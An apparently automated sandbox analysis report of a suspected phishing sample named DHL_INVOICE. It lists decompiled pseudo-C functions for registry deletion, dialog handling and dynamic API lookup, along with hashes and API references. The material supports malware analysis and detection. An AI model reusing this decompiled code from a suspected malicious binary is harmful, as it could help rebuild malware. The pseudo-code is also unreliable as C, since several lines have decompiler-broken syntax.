                                                                            • Opcode Fuzzy Hash: b3da9a1244fcee535f9463e31d5d6ec72300bd819393bad9935e8733ca876ae6
                                                                            • Instruction Fuzzy Hash: 072106337402242BD724A9799C40FAB729DDBC1364F01473AFD6AF31D1E9399C1885A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
                                                                            			E6F1C2049(signed int _a4) {
                                                                            				signed int _t44;
                                                                            				void* _t45;
                                                                            				signed int _t46;
                                                                            				signed int _t50;
                                                                            				void* _t54;
                                                                            				signed int _t57;
                                                                            				void* _t58;
                                                                            				int _t59;
                                                                            
                                                                            				_t50 = _a4;
                                                                            				_t59 = 0;
                                                                            				_t44 = 0 |  *((intOrPtr*)(_t50 + 0x1014)) > 0x00000000;
                                                                            				while(1) {
                                                                            					L1:
                                                                            					_a4 = _t44;
                                                                            					_t57 = _t44 << 5;
                                                                            					_t58 =  *(_t57 + _t50 + 0x1030);
                                                                            					if(_t58 == 0 || _t58 == 0x1a) {
                                                                            						goto L8;
                                                                            					}
                                                                            					if(_t58 != 0xffffffff) {
                                                                            						_t49 = _t58 - 1;
                                                                            						if(_t58 - 1 > 0x18) {
                                                                            							 *(_t57 + _t50 + 0x1030) = 0x1a;
                                                                            							L11:
                                                                            							_t54 = _t57 + _t50;
                                                                            							if( *((intOrPtr*)(_t57 + _t50 + 0x101c)) >= _t59) {
                                                                            							}
                                                                            							_t46 =  *(_t57 + _t50 + 0x1018) & 0x000000ff;
                                                                            							 *(_t57 + _t50 + 0x1034) =  *(_t57 + _t50 + 0x1034) & 0x00000000;
                                                                            							if(_t46 > 7) {
                                                                            								L26:
                                                                            								_t59 = 0;
                                                                            								goto L27;
                                                                            							} else {
                                                                            								switch( *((intOrPtr*)(_t46 * 4 +  &M6F1C21E9))) {
                                                                            									case 0:
                                                                            										_t59 = 0;
                                                                            										 *((intOrPtr*)(_t54 + 0x1020)) = 0;
                                                                            										goto L27;
                                                                            									case 1:
                                                                            										_push(__esi);
                                                                            										__eax = E6F1C135A();
                                                                            										goto L18;
                                                                            									case 2:
                                                                            										_push(__esi);
                                                                            										__eax = E6F1C135A();
                                                                            										_pop(__ecx);
                                                                            										 *__ebp = __eax;
                                                                            										_a4 = __edx;
                                                                            										goto L26;
                                                                            									case 3:
                                                                            										__eax = GlobalAlloc(0x40,  *0x6f1c5040);
                                                                            										 *(__edi + __ebx + 0x1034) = __eax;
                                                                            										 *__ebp = __eax;
                                                                            										__ebp = 0;
                                                                            										__ecx =  *0x6f1c5040;
                                                                            										__eax = WideCharToMultiByte(0, 0, __esi,  *0x6f1c5040, __eax,  *0x6f1c5040, 0, 0);
                                                                            										goto L27;
                                                                            									case 4:
                                                                            										__eax = E6F1C12E1(__esi);
                                                                            										 *(__edi + __ebx + 0x1034) = __eax;
                                                                            										L18:
                                                                            										_pop(__ecx);
                                                                            										 *__ebp = __eax;
                                                                            										goto L26;
                                                                            									case 5:
                                                                            										__eax = GlobalAlloc(0x40, 0x10);
                                                                            										_push(__eax);
                                                                            										 *(__edi + __ebx + 0x1034) = __eax;
                                                                            										_push(__esi);
                                                                            										 *__ebp = __eax;
                                                                            										__imp__CLSIDFromString();
                                                                            										goto L26;
                                                                            									case 6:
                                                                            										__ebp = 0;
                                                                            										if( *__esi != __bp) {
                                                                            											_push(__esi);
                                                                            											__eax = E6F1C135A();
                                                                            											 *(__edi + __ebx + 0x1020) = __eax;
                                                                            										}
                                                                            										L27:
                                                                            										_t47 = GlobalFree(_t58);
                                                                            										_t55 = _a4;
                                                                            										if(_t55 == 0) {
                                                                            											return _t47;
                                                                            										}
                                                                            										_t41 = _t55 + 1; // 0x1
                                                                            										_t53 =  !=  ? _t41 : 0;
                                                                            										_t44 =  !=  ? _t41 : 0;
                                                                            										goto L1;
                                                                            									case 7:
                                                                            										__ecx =  *(__edi + __ebx + 0x1030);
                                                                            										__eax =  *0x6f1c5038;
                                                                            										 *(__edi + __ebx + 0x1030) - 1 = ( *(__edi + __ebx + 0x1030) - 1) *  *0x6f1c5040;
                                                                            										__ecx =  *0x6f1c5038 + ( *(__edi + __ebx + 0x1030) - 1) *  *0x6f1c5040 * 2;
                                                                            										__eax = __ecx + 0x18;
                                                                            										 *(__edx + 0x1020) = __eax;
                                                                            										_push(__ecx);
                                                                            										asm("cdq");
                                                                            										_push(__edx);
                                                                            										_push(__eax);
                                                                            										__eax = E6F1C149E(__ecx);
                                                                            										__esp = __esp + 0xc;
                                                                            										goto L26;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						_t45 = E6F1C1548(_t49);
                                                                            						L9:
                                                                            						L10:
                                                                            						_t58 = _t45;
                                                                            						goto L11;
                                                                            					}
                                                                            					_t45 = E6F1C1593();
                                                                            					goto L10;
                                                                            					L8:
                                                                            					_t45 = E6F1C12E1(0x6f1c40e0);
                                                                            					goto L9;
                                                                            				}
                                                                            			}











                                                                            0x6f1c204a
                                                                            0x6f1c2051
                                                                            0x6f1c205b
                                                                            0x6f1c205e
                                                                            0x6f1c205e
                                                                            0x6f1c2060
                                                                            0x6f1c2064
                                                                            0x6f1c2067
                                                                            0x6f1c2070
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c207a
                                                                            0x6f1c2083
                                                                            0x6f1c2089
                                                                            0x6f1c2093
                                                                            0x6f1c20ad
                                                                            0x6f1c20ad
                                                                            0x6f1c20b7
                                                                            0x6f1c20b7
                                                                            0x6f1c20c7
                                                                            0x6f1c20cf
                                                                            0x6f1c20da
                                                                            0x6f1c21bc
                                                                            0x6f1c21bc
                                                                            0x00000000
                                                                            0x6f1c20e0
                                                                            0x6f1c20e0
                                                                            0x00000000
                                                                            0x6f1c20e7
                                                                            0x6f1c20e9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c20f4
                                                                            0x6f1c20f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2103
                                                                            0x6f1c2104
                                                                            0x6f1c2109
                                                                            0x6f1c210a
                                                                            0x6f1c210d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c212c
                                                                            0x6f1c2132
                                                                            0x6f1c2139
                                                                            0x6f1c213c
                                                                            0x6f1c213e
                                                                            0x6f1c214c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2116
                                                                            0x6f1c211b
                                                                            0x6f1c20fa
                                                                            0x6f1c20fa
                                                                            0x6f1c20fb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2158
                                                                            0x6f1c215e
                                                                            0x6f1c215f
                                                                            0x6f1c2166
                                                                            0x6f1c2167
                                                                            0x6f1c216a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2172
                                                                            0x6f1c2177
                                                                            0x6f1c2179
                                                                            0x6f1c217a
                                                                            0x6f1c2187
                                                                            0x6f1c2187
                                                                            0x6f1c21be
                                                                            0x6f1c21bf
                                                                            0x6f1c21c5
                                                                            0x6f1c21cb
                                                                            0x6f1c21e6
                                                                            0x6f1c21e6
                                                                            0x6f1c21cf
                                                                            0x6f1c21d8
                                                                            0x6f1c21db
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2190
                                                                            0x6f1c2197
                                                                            0x6f1c219d
                                                                            0x6f1c21a4
                                                                            0x6f1c21a7
                                                                            0x6f1c21aa
                                                                            0x6f1c21b0
                                                                            0x6f1c21b1
                                                                            0x6f1c21b2
                                                                            0x6f1c21b3
                                                                            0x6f1c21b4
                                                                            0x6f1c21b9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c20e0
                                                                            0x6f1c20da
                                                                            0x6f1c208c
                                                                            0x6f1c20aa
                                                                            0x6f1c20ab
                                                                            0x6f1c20ab
                                                                            0x00000000
                                                                            0x6f1c20ab
                                                                            0x6f1c207c
                                                                            0x00000000
                                                                            0x6f1c20a0
                                                                            0x6f1c20a5
                                                                            0x00000000
                                                                            0x6f1c20a5

                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F1C21BF
                                                                              • Part of subcall function 6F1C12E1: lstrcpynW.KERNEL32(00000000,?,6F1C156A,?,6F1C11C4,-000000A0), ref: 6F1C12F1
                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 6F1C212C
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F1C214C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1131982632.000000006F1C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F1C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1131958154.000000006F1C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132018644.000000006F1C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132042620.000000006F1C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6f1c0000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                            • String ID:
                                                                            • API String ID: 4216380887-0
                                                                            • Opcode ID: d00050ff8ecd652c549b4a2e613d67727cd0af371d52d0d062b0b2f295cad3f3
                                                                            • Instruction ID: 542a7b57ca2c2feba108d1c2fec0da85284e0591e260be91b374a3875077ee9a
                                                                            • Opcode Fuzzy Hash: d00050ff8ecd652c549b4a2e613d67727cd0af371d52d0d062b0b2f295cad3f3
                                                                            • Instruction Fuzzy Hash: 904127B1445785EFC7009F28C844ADA7BB8FB267D4B42023EE948DA145DB7D6570CAA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 48%
                                                                            			E0040141E(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                            				void* _v4;
                                                                            				void* _v8;
                                                                            				short _v524;
                                                                            				int _v528;
                                                                            				void* _v532;
                                                                            				void* _v536;
                                                                            				void* _v544;
                                                                            				void* _t27;
                                                                            				signed int _t33;
                                                                            				intOrPtr* _t35;
                                                                            				signed int _t43;
                                                                            				signed int _t45;
                                                                            
                                                                            				_t45 = _a12 & 0x00000300;
                                                                            				_t43 = _a12 & 0x00000001;
                                                                            				_t27 = E004062D8(__eflags, _a4, _a8, _t45 | 0x00000009,  &_v532);
                                                                            				if(_t27 == 0) {
                                                                            					if((_a12 & 0x00000002) == 0) {
                                                                            						L3:
                                                                            						_push(0x105);
                                                                            						_push( &_v524);
                                                                            						_push(0);
                                                                            						while(RegEnumKeyW(_v532, ??, ??, ??) == 0) {
                                                                            							__eflags = _t43;
                                                                            							if(__eflags != 0) {
                                                                            								L10:
                                                                            								RegCloseKey(_v532);
                                                                            								return 0x3eb;
                                                                            							}
                                                                            							_t33 = E0040141E(__eflags, _v532,  &_v524, _a12);
                                                                            							__eflags = _t33;
                                                                            							if(_t33 != 0) {
                                                                            								break;
                                                                            							}
                                                                            							_push(0x105);
                                                                            							_push( &_v524);
                                                                            							_push(_t43);
                                                                            						}
                                                                            						RegCloseKey(_v532);
                                                                            						_t35 = E004068E6(3);
                                                                            						if(_t35 != 0) {
                                                                            							return  *_t35(_a4, _a8, _t45, 0);
                                                                            						}
                                                                            						return RegDeleteKeyW(_a4, _a8);
                                                                            					}
                                                                            					_v528 = 0;
                                                                            					if(RegEnumValueW(_v532, 0,  &_v524,  &_v528, 0, 0, 0, 0) != 0x103) {
                                                                            						goto L10;
                                                                            					}
                                                                            					goto L3;
                                                                            				}
                                                                            				return _t27;
                                                                            			}















                                                                            0x00401438
                                                                            0x00401441
                                                                            0x00401456
                                                                            0x0040145d
                                                                            0x0040146d
                                                                            0x00401493
                                                                            0x00401493
                                                                            0x0040149c
                                                                            0x0040149d
                                                                            0x004014ce
                                                                            0x004014a6
                                                                            0x004014a8
                                                                            0x00401503
                                                                            0x00401507
                                                                            0x00000000
                                                                            0x0040150d
                                                                            0x004014ba
                                                                            0x004014bf
                                                                            0x004014c1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004014c3
                                                                            0x004014cc
                                                                            0x004014cd
                                                                            0x004014cd
                                                                            0x004014dc
                                                                            0x004014e4
                                                                            0x004014eb
                                                                            0x00000000
                                                                            0x00401525
                                                                            0x00000000
                                                                            0x004014fb
                                                                            0x00401477
                                                                            0x00401491
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401491
                                                                            0x00401530

                                                                            APIs
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401507
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CloseEnum$DeleteValue
                                                                            • String ID:
                                                                            • API String ID: 1354259210-0
                                                                            • Opcode ID: 30017b8bd83a5a7471793a7c8ba9a53ddb3d91c26afeeaccdb12cfd0c7e39771
                                                                            • Instruction ID: 21b5a5252aa063403de6f9026dc2c812d9767c74370f87ead0cd0c39fa3adcf8
                                                                            • Opcode Fuzzy Hash: 30017b8bd83a5a7471793a7c8ba9a53ddb3d91c26afeeaccdb12cfd0c7e39771
                                                                            • Instruction Fuzzy Hash: 3F218032108244BBD7219F51DC08FABBBADEFD9344F01043AF989A11B0D3399A14DA6A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                            			E00401EEA(struct HWND__* __edx, intOrPtr _a16, WCHAR* _a20, signed int _a24, signed int _a28, intOrPtr _a40, signed short _a44, int _a48, signed int _a52, struct tagRECT _a80, signed int _a88, signed int _a92) {
                                                                            				struct HWND__* _t21;
                                                                            				signed int _t22;
                                                                            				signed int _t23;
                                                                            				void* _t35;
                                                                            				signed int _t41;
                                                                            				long _t42;
                                                                            				intOrPtr _t43;
                                                                            				int _t53;
                                                                            				struct HWND__* _t55;
                                                                            
                                                                            				_t49 = __edx;
                                                                            				if((_a52 & 0x00000100) == 0) {
                                                                            					_t21 = GetDlgItem(__edx, _a48);
                                                                            				} else {
                                                                            					E00403002(2);
                                                                            				}
                                                                            				_t55 = _t21;
                                                                            				_t22 = _a52;
                                                                            				_a28 = _t22 & 0x00000004;
                                                                            				_t53 = _t22 & 0x00000003;
                                                                            				_t41 = _t22 >> 0x0000001e & 0x00000001;
                                                                            				_a24 = _t22 >> 0x1f;
                                                                            				if((_t22 & 0x00010000) == 0) {
                                                                            					_t23 = _a44 & 0x0000ffff;
                                                                            				} else {
                                                                            					_t23 = E0040303E(_t49, 0x11);
                                                                            				}
                                                                            				_a20 = _t23;
                                                                            				GetClientRect(_t55,  &_a80);
                                                                            				_t33 =  !=  ?  *0x4349f4 : 0;
                                                                            				_t42 = LoadImageW( !=  ?  *0x4349f4 : 0, _a20, _t53, _a88 * _a24, _a92 * _t41, _a52 & 0x0000fef0);
                                                                            				_t35 = SendMessageW(_t55, 0x172, _t53, _t42);
                                                                            				if(_t35 != 0 && _t53 == 0) {
                                                                            					DeleteObject(_t35);
                                                                            				}
                                                                            				if(_a40 >= 0) {
                                                                            					_push(_t42);
                                                                            					E0040661F();
                                                                            				}
                                                                            				_t43 = _a16;
                                                                            				 *0x435ac8 =  *0x435ac8 + _t43;
                                                                            				return 0;
                                                                            			}












                                                                            0x00401eea
                                                                            0x00401ef2
                                                                            0x00401f03
                                                                            0x00401ef4
                                                                            0x00401ef6
                                                                            0x00401efb
                                                                            0x00401f09
                                                                            0x00401f0b
                                                                            0x00401f19
                                                                            0x00401f21
                                                                            0x00401f27
                                                                            0x00401f2a
                                                                            0x00401f33
                                                                            0x00401f3e
                                                                            0x00401f35
                                                                            0x00401f37
                                                                            0x00401f37
                                                                            0x00401f43
                                                                            0x00401f4d
                                                                            0x00401f7a
                                                                            0x00401f88
                                                                            0x00401f92
                                                                            0x00401f9a
                                                                            0x00401fa1
                                                                            0x00401fa1
                                                                            0x00401fac
                                                                            0x00401fb2
                                                                            0x004016b7
                                                                            0x004016b7
                                                                            0x00402ea1
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401F03
                                                                            • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                                                            • LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
                                                                            • SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
                                                                            • DeleteObject.GDI32(00000000), ref: 00401FA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 4ca5b3e5092630b07da66f14ef21835f456d21acd53533bfcf070e0f2a8088fe
                                                                            • Instruction ID: 799bb538699f0f6bb00644a204e03bb935fb5af8a8b8547909695eab986b8c59
                                                                            • Opcode Fuzzy Hash: 4ca5b3e5092630b07da66f14ef21835f456d21acd53533bfcf070e0f2a8088fe
                                                                            • Instruction Fuzzy Hash: 2A218072609302AFD340DF64DD85A6BB7E8EB88305F04093EF945E62A1D678DD40DB5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E6F1C1F7B(struct HINSTANCE__* _a4, short* _a8) {
                                                                            				_Unknown_base(*)()* _t7;
                                                                            				void* _t10;
                                                                            				int _t11;
                                                                            
                                                                            				_t11 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                            				_t10 = GlobalAlloc(0x40, _t11);
                                                                            				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t11, 0, 0);
                                                                            				_t7 = GetProcAddress(_a4, _t10);
                                                                            				GlobalFree(_t10);
                                                                            				return _t7;
                                                                            			}






                                                                            0x6f1c1f92
                                                                            0x6f1c1fa0
                                                                            0x6f1c1fab
                                                                            0x6f1c1fb6
                                                                            0x6f1c1fbf
                                                                            0x6f1c1fca

                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6F1C2B4C,00000000,00000808), ref: 6F1C1F8C
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 6F1C1F97
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6F1C1FAB
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 6F1C1FB6
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F1C1FBF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1131982632.000000006F1C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F1C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1131958154.000000006F1C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132018644.000000006F1C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132042620.000000006F1C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6f1c0000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                            • String ID:
                                                                            • API String ID: 1148316912-0
                                                                            • Opcode ID: bfdb9ee4aedea998f47d0d8f5ae9017cf2b17a9e270e6a5eb9463d25d34bb4fd
                                                                            • Instruction ID: 05b46cdd8f37f704eae6e50f637fcb0d90d1f91946797a8b6d783211b43c4210
                                                                            • Opcode Fuzzy Hash: bfdb9ee4aedea998f47d0d8f5ae9017cf2b17a9e270e6a5eb9463d25d34bb4fd
                                                                            • Instruction Fuzzy Hash: 05F0C03214C518BBCA101AE7DC0CD97BE7CFB8B6FAB170255F619D11A0C96768208771
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                            			E00401DBA(void* _a8, struct HWND__* _a12, intOrPtr _a16, struct HWND__* _a20, long _a28, void* _a32, intOrPtr _a36, intOrPtr _a56, signed int _a60) {
                                                                            				signed char _t23;
                                                                            				void* _t25;
                                                                            				long _t26;
                                                                            				int _t30;
                                                                            				long _t34;
                                                                            				intOrPtr _t35;
                                                                            				int _t47;
                                                                            				void* _t48;
                                                                            				int _t52;
                                                                            				void* _t53;
                                                                            				int _t55;
                                                                            				void* _t57;
                                                                            
                                                                            				_t52 = E00403002(3);
                                                                            				_a20 = _t52;
                                                                            				_t34 = E00403002(4);
                                                                            				_t23 = _a60;
                                                                            				if((_t23 & 0x00000001) != 0) {
                                                                            					__esi = E0040303E(__edx, 0x33);
                                                                            					_a16 = __esi;
                                                                            				}
                                                                            				if((_t23 & 0x00000002) != 0) {
                                                                            					_t34 = E0040303E(_t48, 0x44);
                                                                            				}
                                                                            				_push(1);
                                                                            				if(_a36 != 0x21) {
                                                                            					_t53 = E0040303E(_t48);
                                                                            					_t25 = E0040303E(_t48);
                                                                            					_t41 =  !=  ? _t25 : 0;
                                                                            					_t43 =  !=  ? _t53 : 0;
                                                                            					_t26 = FindWindowExW(_a12, _t34,  !=  ? _t53 : 0,  !=  ? _t25 : 0);
                                                                            					goto L12;
                                                                            				} else {
                                                                            					_a20 = E00403002();
                                                                            					_t30 = E00403002(2);
                                                                            					_t47 = _a60 >> 2;
                                                                            					if(_t47 == 0) {
                                                                            						_t26 = SendMessageW(_a20, _t30, _t52, _t34);
                                                                            						L12:
                                                                            						_a28 = _t26;
                                                                            					} else {
                                                                            						SendMessageTimeoutW(_a20, _t30, _t52, _t34, _t55, _t47,  &_a28);
                                                                            						asm("sbb ebx, ebx");
                                                                            						_t26 = _a28;
                                                                            						_a16 = _t34 + 1;
                                                                            					}
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t57 + 0x28)) >= _t55) {
                                                                            					_push(_t26);
                                                                            					E0040661F();
                                                                            				}
                                                                            				_t35 = _a16;
                                                                            				 *0x435ac8 =  *0x435ac8 + _t35;
                                                                            				return 0;
                                                                            			}















                                                                            0x00401dc1
                                                                            0x00401dc5
                                                                            0x00401dce
                                                                            0x00401dd0
                                                                            0x00401dd8
                                                                            0x00401de1
                                                                            0x00401de7
                                                                            0x00401de7
                                                                            0x00401ded
                                                                            0x00401df6
                                                                            0x00401df6
                                                                            0x00401dfd
                                                                            0x00401dff
                                                                            0x00401e57
                                                                            0x00401e59
                                                                            0x00401e63
                                                                            0x00401e6c
                                                                            0x00401e75
                                                                            0x00000000
                                                                            0x00401e01
                                                                            0x00401e08
                                                                            0x00401e0c
                                                                            0x00401e17
                                                                            0x00401e1c
                                                                            0x00401e48
                                                                            0x00401e7b
                                                                            0x00401e7b
                                                                            0x00401e1e
                                                                            0x00401e2c
                                                                            0x00401e34
                                                                            0x00401e36
                                                                            0x00401e3b
                                                                            0x00401e3b
                                                                            0x00401e1c
                                                                            0x00401e83
                                                                            0x00401afd
                                                                            0x004016b7
                                                                            0x004016b7
                                                                            0x00402ea1
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 91d7549d19bfd9567b9db0d62f4607727a13d94ab572956bc1fd2bc583f7e011
                                                                            • Instruction ID: 1d489b1cab37c72f7a9fe7ae17229530812e46ff9257658ed8c6d6ee4a6b2e26
                                                                            • Opcode Fuzzy Hash: 91d7549d19bfd9567b9db0d62f4607727a13d94ab572956bc1fd2bc583f7e011
                                                                            • Instruction Fuzzy Hash: 4F21F471609301AFE714AF21C886A2FBBE8EF84755F00093FF585A61E0D6B99D05CB5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E6F1C1F1E(intOrPtr _a4, WCHAR* _a8) {
                                                                            				intOrPtr _t11;
                                                                            				intOrPtr _t19;
                                                                            				WCHAR* _t21;
                                                                            
                                                                            				_t11 = _a4;
                                                                            				if( *((intOrPtr*)(_t11 + 4)) != 1) {
                                                                            					_t21 = _a8;
                                                                            					_t13 =  ==  ? 0x6f1c40d8 : L"error";
                                                                            					lstrcpyW(_t21,  ==  ? 0x6f1c40d8 : L"error");
                                                                            				} else {
                                                                            					_t19 =  *((intOrPtr*)(_t11 + 0x1c98));
                                                                            					if(( *(_t11 + 0x1010) & 0x00000100) != 0) {
                                                                            						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x100c)) + 1));
                                                                            					}
                                                                            					_t21 = _a8;
                                                                            					wsprintfW(_t21, L"callback%d", _t19);
                                                                            				}
                                                                            				return _t21;
                                                                            			}






                                                                            0x6f1c1f1e
                                                                            0x6f1c1f29
                                                                            0x6f1c1f5c
